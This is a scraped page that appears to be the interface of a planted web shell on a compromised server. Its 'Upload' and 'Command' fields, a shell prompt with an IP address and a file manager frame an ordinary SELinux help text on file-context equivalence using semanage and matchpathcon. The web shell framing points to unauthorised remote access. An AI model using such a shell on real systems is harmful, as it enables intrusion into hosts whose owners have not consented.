404

[ Avaa Bypassed ]

Upload:

Command:

elspacio@3.147.127.96: ~ $ 
SELinux can either setup labeling directory using the Application/files screen, or you can setup file equivalence.


File Equivalence allows an administrator to label entire directory trees as the same way as the Equivalence directory tree.

Use Case 1:
An administrator want to store his Apache root content in a location other then /var/www like /srv/www. He could define an equivalence between /srv/www and /var/www.

libselinux reads the equivalence rules and does the substitution when ever the matchpathcon function is called.  Tools like restorecon/rpm/udev and others will all follow the substitution.  Using the example above when matchpathcon is handed /srv/www/cgi-bin/myscript.cgi, it substitutes /var/www for /svr/www and looks up the context of /var/www/cgi-bin/myscript.cgi.

In the command line you could execute.

# semanage fcontext -a -e /var/www /srv/www

Another common case where you might want to use file equivalence, is if you put your users home directories in a location other then /home.

If you setup an equivalence between /home and /export/home

# matchpathcon /export/home/dwalsh/.ssh
/export/home/dwalsh/.ssh    unconfined_u:object_r:home_ssh_t:s0

Filemanager

DIR : / lib/ python3.6/ site-packages/ sepolicy/ help/
Name Type Size Permission Actions
__pycache__ Folder 0755
__init__.py File 0 B 0644
booleans.png File 71.04 KB 0644
booleans.txt File 478 B 0644
booleans_more.png File 60.89 KB 0644
booleans_more.txt File 193 B 0644
booleans_more_show.png File 34.13 KB 0644
booleans_more_show.txt File 62 B 0644
booleans_toggled.png File 60.51 KB 0644
booleans_toggled.txt File 310 B 0644
file_equiv.png File 48.07 KB 0644
file_equiv.txt File 1.15 KB 0644
files_apps.png File 80.06 KB 0644
files_apps.txt File 563 B 0644
files_exec.png File 66.28 KB 0644
files_exec.txt File 398 B 0644
files_write.png File 75.95 KB 0644
files_write.txt File 567 B 0644
lockdown.png File 49.41 KB 0644
lockdown.txt File 291 B 0644
lockdown_permissive.png File 29.32 KB 0644
lockdown_permissive.txt File 722 B 0644
lockdown_ptrace.png File 28.65 KB 0644
lockdown_ptrace.txt File 1.22 KB 0644
lockdown_unconfined.png File 26.83 KB 0644
lockdown_unconfined.txt File 867 B 0644
login.png File 39.16 KB 0644
login.txt File 786 B 0644
login_default.png File 40.7 KB 0644
login_default.txt File 507 B 0644
ports_inbound.png File 57.61 KB 0644
ports_inbound.txt File 336 B 0644
ports_outbound.png File 51.74 KB 0644
ports_outbound.txt File 346 B 0644
start.png File 13.8 KB 0644
start.txt File 505 B 0644
system.png File 49.42 KB 0644
system.txt File 81 B 0644
system_boot_mode.png File 51.44 KB 0644
system_boot_mode.txt File 458 B 0644
system_current_mode.png File 51.41 KB 0644
system_current_mode.txt File 344 B 0644
system_export.png File 51.96 KB 0644
system_export.txt File 416 B 0644
system_policy_type.png File 53.35 KB 0644
system_policy_type.txt File 410 B 0644
system_relabel.png File 51.63 KB 0644
system_relabel.txt File 399 B 0644
transition_file.png File 68.14 KB 0644
transition_file.txt File 1.03 KB 0644
transition_from.png File 61.75 KB 0644
transition_from.txt File 619 B 0644
transition_from_boolean.png File 65.75 KB 0644
transition_from_boolean.txt File 463 B 0644
transition_from_boolean_1.png File 70.04 KB 0644
transition_from_boolean_1.txt File 235 B 0644
transition_from_boolean_2.png File 31.46 KB 0644
transition_from_boolean_2.txt File 132 B 0644
transition_to.png File 57.53 KB 0644
transition_to.txt File 605 B 0644
users.png File 56.27 KB 0644
users.txt File 814 B 0644